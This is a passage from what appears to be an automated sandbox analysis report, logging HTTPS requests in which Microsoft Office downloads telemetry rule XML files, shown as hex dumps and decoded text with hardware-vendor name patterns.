                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120621" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120619" /> <SR T="2" R="([Vv][Mm][Ww][Aa][Rr][Ee])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tru


                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                      35192.168.2.44979213.107.246.63443
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      2024-12-03 07:55:00 UTC192OUTGET /rules/rule120622v0s19.xml HTTP/1.1
                                                                                                                      Connection: Keep-Alive
                                                                                                                      Accept-Encoding: gzip
                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                      2024-12-03 07:55:00 UTC470INHTTP/1.1 200 OK
                                                                                                                      Date: Tue, 03 Dec 2024 07:55:00 GMT
                                                                                                                      Content-Type: text/xml
                                                                                                                      Content-Length: 477
                                                                                                                      Connection: close
                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:26:38 GMT
                                                                                                                      ETag: "0x8DC582BB8CEAC16"
                                                                                                                      x-ms-request-id: fbe1121d-d01e-0082-7beb-44e489000000
                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                      x-azure-ref: 20241203T075500Z-174f78459685726chC1EWRsnbg00000015qg000000004trm
                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                      X-Cache: TCP_HIT
                                                                                                                      Accept-Ranges: bytes
                                                                                                                      2024-12-03 07:55:00 UTC477INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120622" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120621" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                      36192.168.2.44979413.107.246.63443
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      2024-12-03 07:55:02 UTC192OUTGET /rules/rule120623v0s19.xml HTTP/1.1
                                                                                                                      Connection: Keep-Alive
                                                                                                                      Accept-Encoding: gzip
                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                      2024-12-03 07:55:02 UTC470INHTTP/1.1 200 OK
                                                                                                                      Date: Tue, 03 Dec 2024 07:55:02 GMT
                                                                                                                      Content-Type: text/xml
                                                                                                                      Content-Length: 464
                                                                                                                      Connection: close
                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:25:43 GMT
                                                                                                                      ETag: "0x8DC582B97FB6C3C"
                                                                                                                      x-ms-request-id: a99e6065-701e-006f-4d91-3fafc4000000
                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                      x-azure-ref: 20241203T075502Z-174f7845968zgtf6hC1EWRqd8s0000000ypg000000001une
                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                      X-Cache: TCP_HIT
                                                                                                                      Accept-Ranges: bytes
                                                                                                                      2024-12-03 07:55:02 UTC464INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 47 67 5d 5b 49 69 5d 5b 47 67 5d 5b 41 61 5d 5b 42 62 5d 5b 59 79 5d 5b 54 74 5d 5b 45 65 5d 20 5b 54 74 5d 5b 45 65 5d 5b 43 63 5d 5b 48 68 5d 5b 4e 6e 5d 5b 4f 6f 5d 5b 4c 6c 5d 5b 4f 6f 5d 5b 47 67 5d 5b 59 79 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72
                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120623" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120621" /> <SR T="2" R="([Gg][Ii][Gg][Aa][Bb][Yy][Tt][Ee] [Tt][Ee][Cc][Hh][Nn][Oo][Ll][Oo][Gg][Yy])"> <S T="1" F="1" M="Ignor


                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                      37192.168.2.44979513.107.246.63443
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      2024-12-03 07:55:02 UTC192OUTGET /rules/rule120624v0s19.xml HTTP/1.1
                                                                                                                      Connection: Keep-Alive
                                                                                                                      Accept-Encoding: gzip
                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                      2024-12-03 07:55:02 UTC470INHTTP/1.1 200 OK
                                                                                                                      Date: Tue, 03 Dec 2024 07:55:02 GMT
                                                                                                                      Content-Type: text/xml
                                                                                                                      Content-Length: 494
                                                                                                                      Connection: close
                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:26:35 GMT
                                                                                                                      ETag: "0x8DC582BB7010D66"
                                                                                                                      x-ms-request-id: ef6c78e4-401e-0067-2ec7-4309c2000000
                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                      x-azure-ref: 20241203T075502Z-174f7845968frfdmhC1EWRxxbw00000015q0000000004y5p
                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                      X-Cache: TCP_HIT
                                                                                                                      Accept-Ranges: bytes
                                                                                                                      2024-12-03 07:55:02 UTC494INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120624" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120623" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                      38192.168.2.44979813.107.246.63443
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      2024-12-03 07:55:02 UTC192OUTGET /rules/rule120627v0s19.xml HTTP/1.1
                                                                                                                      Connection: Keep-Alive
                                                                                                                      Accept-Encoding: gzip
                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                      2024-12-03 07:55:02 UTC470INHTTP/1.1 200 OK
                                                                                                                      Date: Tue, 03 Dec 2024 07:55:02 GMT
                                                                                                                      Content-Type: text/xml
                                                                                                                      Content-Length: 404
                                                                                                                      Connection: close
                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:25:54 GMT
                                                                                                                      ETag: "0x8DC582B9E8EE0F3"
                                                                                                                      x-ms-request-id: 3f7caad5-701e-006f-6962-43afc4000000
                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                      x-azure-ref: 20241203T075502Z-174f7845968frfdmhC1EWRxxbw00000015t00000000011u3
                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                      X-Cache: TCP_HIT
                                                                                                                      Accept-Ranges: bytes
                                                                                                                      2024-12-03 07:55:02 UTC404INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 4e 6e 5d 5b 45 65 5d 5b 43 63 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20 20 3c 53
                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120627" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120625" /> <SR T="2" R="^([Nn][Ee][Cc])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true"> <S


                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                      39192.168.2.44979713.107.246.63443
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      2024-12-03 07:55:02 UTC192OUTGET /rules/rule120625v0s19.xml HTTP/1.1
                                                                                                                      Connection: Keep-Alive
                                                                                                                      Accept-Encoding: gzip
                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                      2024-12-03 07:55:02 UTC470INHTTP/1.1 200 OK
                                                                                                                      Date: Tue, 03 Dec 2024 07:55:02 GMT
                                                                                                                      Content-Type: text/xml
                                                                                                                      Content-Length: 419
                                                                                                                      Connection: close
                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:25:42 GMT
                                                                                                                      ETag: "0x8DC582B9748630E"
                                                                                                                      x-ms-request-id: 0f0a23f1-f01e-0099-76b2-429171000000
                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                      x-azure-ref: 20241203T075502Z-174f78459684bddphC1EWRbht400000015b0000000006hts
                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                      X-Cache: TCP_HIT
                                                                                                                      Accept-Ranges: bytes
                                                                                                                      2024-12-03 07:55:02 UTC419INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 46 66 5d 5b 55 75 5d 5b 4a 6a 5d 5b 49 69 5d 5b 54 74 5d 5b 53 73 5d 5b 55 75 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d
                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120625" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120623" /> <SR T="2" R="([Ff][Uu][Jj][Ii][Tt][Ss][Uu])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=


                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                      40192.168.2.44979613.107.246.63443
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      2024-12-03 07:55:02 UTC192OUTGET /rules/rule120626v0s19.xml HTTP/1.1
                                                                                                                      Connection: Keep-Alive
                                                                                                                      Accept-Encoding: gzip
                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                      2024-12-03 07:55:02 UTC470INHTTP/1.1 200 OK
                                                                                                                      Date: Tue, 03 Dec 2024 07:55:02 GMT
                                                                                                                      Content-Type: text/xml
                                                                                                                      Content-Length: 472
                                                                                                                      Connection: close
                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:25:53 GMT
                                                                                                                      ETag: "0x8DC582B9DACDF62"
                                                                                                                      x-ms-request-id: 905b8fff-d01e-00a1-0300-4235b1000000
                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                      x-azure-ref: 20241203T075502Z-174f7845968ljs8phC1EWRe6en00000015eg000000006qcf
                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                      X-Cache: TCP_HIT
                                                                                                                      Accept-Ranges: bytes
                                                                                                                      2024-12-03 07:55:02 UTC472INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120626" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120625" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                      41192.168.2.44979913.107.246.63443
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      2024-12-03 07:55:04 UTC192OUTGET /rules/rule120628v0s19.xml HTTP/1.1
                                                                                                                      Connection: Keep-Alive
                                                                                                                      Accept-Encoding: gzip
                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                      2024-12-03 07:55:04 UTC470INHTTP/1.1 200 OK
                                                                                                                      Date: Tue, 03 Dec 2024 07:55:04 GMT
                                                                                                                      Content-Type: text/xml
                                                                                                                      Content-Length: 468
                                                                                                                      Connection: close
                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:25:51 GMT
                                                                                                                      ETag: "0x8DC582B9C8E04C8"
                                                                                                                      x-ms-request-id: 5181e575-b01e-001e-206f-430214000000
                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                      x-azure-ref: 20241203T075504Z-174f7845968jrjrxhC1EWRmmrs00000015vg000000001gwn
                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                      X-Cache: TCP_HIT
                                                                                                                      Accept-Ranges: bytes
                                                                                                                      2024-12-03 07:55:04 UTC468INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120628" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120627" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                      42192.168.2.44980013.107.246.63443
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      2024-12-03 07:55:04 UTC192OUTGET /rules/rule120629v0s19.xml HTTP/1.1
                                                                                                                      Connection: Keep-Alive
                                                                                                                      Accept-Encoding: gzip
                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                      2024-12-03 07:55:04 UTC470INHTTP/1.1 200 OK
                                                                                                                      Date: Tue, 03 Dec 2024 07:55:04 GMT
                                                                                                                      Content-Type: text/xml
                                                                                                                      Content-Length: 428
                                                                                                                      Connection: close
                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:26:17 GMT
                                                                                                                      ETag: "0x8DC582BAC4F34CA"
                                                                                                                      x-ms-request-id: 7732d518-401e-0035-4c64-4482d8000000
                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                      x-azure-ref: 20241203T075504Z-174f78459685726chC1EWRsnbg00000015s0000000002mbr
                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                      X-Cache: TCP_HIT
                                                                                                                      Accept-Ranges: bytes
                                                                                                                      2024-12-03 07:55:04 UTC428INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4d 6d 5d 5b 49 69 5d 5b 43 63 5d 5b 52 72 5d 5b 4f 6f 5d 2d 5b 53 73 5d 5b 54 74 5d 5b 41 61 5d 5b 52 72 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22
                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120629" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120627" /> <SR T="2" R="([Mm][Ii][Cc][Rr][Oo]-[Ss][Tt][Aa][Rr])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W"


                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                      43192.168.2.44980213.107.246.63443
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      2024-12-03 07:55:04 UTC192OUTGET /rules/rule120631v0s19.xml HTTP/1.1
                                                                                                                      Connection: Keep-Alive
                                                                                                                      Accept-Encoding: gzip
                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                      2024-12-03 07:55:05 UTC470INHTTP/1.1 200 OK
                                                                                                                      Date: Tue, 03 Dec 2024 07:55:04 GMT
                                                                                                                      Content-Type: text/xml
                                                                                                                      Content-Length: 415
                                                                                                                      Connection: close
                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:25:44 GMT
                                                                                                                      ETag: "0x8DC582B988EBD12"
                                                                                                                      x-ms-request-id: f440c5dc-801e-0047-7891-3f7265000000
                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                      x-azure-ref: 20241203T075504Z-174f7845968zgtf6hC1EWRqd8s0000000yp0000000002c8a
                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                      X-Cache: TCP_HIT
                                                                                                                      Accept-Ranges: bytes
                                                                                                                      2024-12-03 07:55:05 UTC415INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 48 68 5d 5b 55 75 5d 5b 41 61 5d 5b 57 77 5d 5b 45 65 5d 5b 49 69 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75
                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120631" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120629" /> <SR T="2" R="([Hh][Uu][Aa][Ww][Ee][Ii])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tru


                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                      44192.168.2.44980113.107.246.63443
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      2024-12-03 07:55:04 UTC192OUTGET /rules/rule120630v0s19.xml HTTP/1.1
                                                                                                                      Connection: Keep-Alive
                                                                                                                      Accept-Encoding: gzip
                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                      2024-12-03 07:55:05 UTC470INHTTP/1.1 200 OK
                                                                                                                      Date: Tue, 03 Dec 2024 07:55:04 GMT
                                                                                                                      Content-Type: text/xml
                                                                                                                      Content-Length: 499
                                                                                                                      Connection: close
                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:25:45 GMT
                                                                                                                      ETag: "0x8DC582B98CEC9F6"
                                                                                                                      x-ms-request-id: 98fcde7c-201e-0096-4eef-44ace6000000
                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                      x-azure-ref: 20241203T075504Z-174f7845968xr5c2hC1EWRd0hn0000000qgg000000003xfg
                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                      X-Cache: TCP_HIT
                                                                                                                      Accept-Ranges: bytes
                                                                                                                      2024-12-03 07:55:05 UTC499INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120630" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120629" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                      45192.168.2.44980313.107.246.63443
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      2024-12-03 07:55:04 UTC192OUTGET /rules/rule120632v0s19.xml HTTP/1.1
                                                                                                                      Connection: Keep-Alive
                                                                                                                      Accept-Encoding: gzip
                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                      2024-12-03 07:55:05 UTC470INHTTP/1.1 200 OK
                                                                                                                      Date: Tue, 03 Dec 2024 07:55:04 GMT
                                                                                                                      Content-Type: text/xml
                                                                                                                      Content-Length: 471
                                                                                                                      Connection: close
                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:26:33 GMT
                                                                                                                      ETag: "0x8DC582BB5815C4C"
